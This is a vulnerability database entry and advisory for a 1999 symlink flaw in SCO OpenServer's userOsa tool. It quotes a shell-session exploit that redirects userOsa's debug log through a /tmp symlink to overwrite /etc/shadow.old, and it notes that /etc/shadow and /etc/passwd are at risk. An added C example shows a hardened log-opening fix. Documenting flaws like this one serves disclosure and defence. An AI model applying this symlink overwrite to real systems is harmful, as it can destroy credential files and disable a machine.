SCO OpenServer userOsa File Corruption Vulnerability

Vulnerability ID: 1105566
Vulnerability type: Unknown
Published: 1999-10-11
Updated: 2005-05-02
CVE ID: CVE-1999-0893
CNNVD-ID: CNNVD-199910-027
Platform: SCO
CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/19542
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199910-027
|Vulnerability details
A vulnerability exists in userOsa in SCO OpenServer. A local user can corrupt files through a symbolic link attack.
|Exploit
source: http://www.securityfocus.com/bid/701/info

Under certain versions of SCO OpenServer there exists a symlink vulnerability which can be exploited to overwrite any file which is group writable by the 'auth' group. The problem is in the /etc/sysadm.d/bin/userOsa executable. When given garbage input, the program writes out a debug log. However, it does not check whether it is overwriting an existing file, nor whether it is following a symlink. It is therefore possible to overwrite, with debug data, files which are both in the 'auth' group and writable by that group. Both /etc/shadow and /etc/passwd fall into this category. If such an attack were launched against these files, the system would be rendered unusable.

scohack:/tmp$ ln -s /etc/shadow.old debug.log
scohack:/tmp$ /etc/sysadm.d/bin/userOsa
bah
connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect
Request: bah}}}
Failed to listen to client
Failure in making connection to OSA.
scohack:/tmp$

-----

BEFORE EXPLOIT:
scohack:/# l /etc/shadow.old
-rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old

AFTER EXPLOIT (note the file size):
scohack:/# l /etc/shadow.old
-rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old

scohack:/# cat /etc/shadow.old
>>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604>
<<<
SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ
{Invalid Connect Request: bah}}})

scohack:/#
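
A hardened way to open a debug log of this kind, shown as an added example in C; it is not SCO's code and not part of the original advisory. The names `open_debug_log` and `log_open_outcome`, the temporary directory and the file contents are hypothetical and constructed for the demonstration.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE /* mkdtemp(), symlink(), O_NOFOLLOW */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

static const char VICTIM_DATA[] = "constructed victim contents\n";

/* Hypothetical helper: returns an fd for a newly created log, or -1.
 * O_EXCL makes open() fail if the name already exists, symlink or not,
 * so a pre-planted debug.log is never written through. */
int open_debug_log(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    /* Defence in depth: must be a regular file with exactly one link. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: debug.log optionally pre-planted as a symlink to a
 * victim file. Returns 1 if a log was created, 0 if the open was refused,
 * -1 on setup failure or if the victim's size changed. */
int log_open_outcome(int plant_symlink)
{
    char dir[] = "/tmp/osa-demo-XXXXXX", victim[64], logpath[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/shadow.old", dir);
    snprintf(logpath, sizeof logpath, "%s/debug.log", dir);
    FILE *f = fopen(victim, "w");
    if (!f || fputs(VICTIM_DATA, f) < 0 || fclose(f) != 0) return -1;
    if (plant_symlink && symlink(victim, logpath) != 0) return -1;
    int fd = open_debug_log(logpath);
    if (fd >= 0) { if (write(fd, "debug data\n", 11) != 11) perror("write"); close(fd); }
    int intact = stat(victim, &st) == 0 &&
                 st.st_size == (off_t)(sizeof VICTIM_DATA - 1);
    unlink(logpath); unlink(victim); rmdir(dir);
    return intact ? (fd >= 0) : -1;
}

int main(void) { return log_open_outcome(1) == 0 && log_open_outcome(0) == 1 ? 0 : 1; }
```

With the symlink in place the open is refused and the victim file keeps its original size; with no pre-existing name the log is created normally.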
|References
Vulnerable software and versions: cpe:/o:sco:openserver:5.0
CVE Standard Vulnerability Entry: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0893
